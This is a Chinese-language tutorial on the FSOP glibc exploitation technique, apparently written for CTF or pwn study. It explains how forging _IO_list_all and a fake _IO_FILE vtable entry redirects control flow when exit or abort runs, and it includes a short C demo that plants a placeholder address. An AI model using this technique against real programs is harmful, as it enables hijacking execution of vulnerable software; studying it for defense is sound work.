FSOP

FSOP

  进程内所有的_IO_FILE结构会使用_chain域相互连接形成一个链表,这个链表的头部由_IO_list_all维护。

1

​   FSOP的核心思想就是劫持_IO_list_all的值来伪造链表和其中的_IO_FILE项,但是单纯的伪造只是构造了数据还需要某种方法进行触发。FSOP选择的触发方法是调用_IO_flush_all_lockp,这个函数会刷新_IO_list_all链表中所有项的文件流,相当于对每个FILE调用fflush,也对应着会调用_IO_FILE_plus.vtable中的_IO_overflow。

2

_IO_flush_all_lockp的触发方式

1.当libc执行abort流程时

2.当执行exit函数时

3.当执行流从main函数返回时

_IO_flush_all_lockp的触发流程图

3

由源码可以知道为了在执行_IO_flush_all_lockp函数时能够跳转到vtable上的__overflow(64位下偏移为0x18),我们需要伪造的地方

1,_IO_list_all指针的值 使其指向我们伪造的_IO_FILE_plus结构

2,fp->_mode 满足条件fp->_mode<=0

3,fp->_IO_write_ptr ,fp->_IO_write_base 满足条件fp->_IO_write_ptr > fp->_IO_write_base

4,vtable偏移量为0x18的地方 填入onegadget或者system

FSOP攻击图解

4

演示代码

#define mode_offset 0xc0
#define writeptr_offset 0x28
#define writebase_offset 0x20
#define vtable_offset 0xd8

int main(void)
{
    void *ptr;
    long long *list_all_ptr;

    ptr=malloc(0x200);

    *(long long*)((long long)ptr+mode_offset)=0x0;
    *(long long*)((long long)ptr+writeptr_offset)=0x1;
    *(long long*)((long long)ptr+writebase_offset)=0x0;
    *(long long*)((long long)ptr+vtable_offset)=((long long)ptr+0x100);

    *(long long*)((long long)ptr+0x100+24)=0x41414141;

    list_all_ptr=(long long *)_IO_list_all;

    list_all_ptr[0]=ptr;

    exit(0);
}

执行到exit(0)的时候触发了_IO_flush_all_lockp,gdb运行结果:

5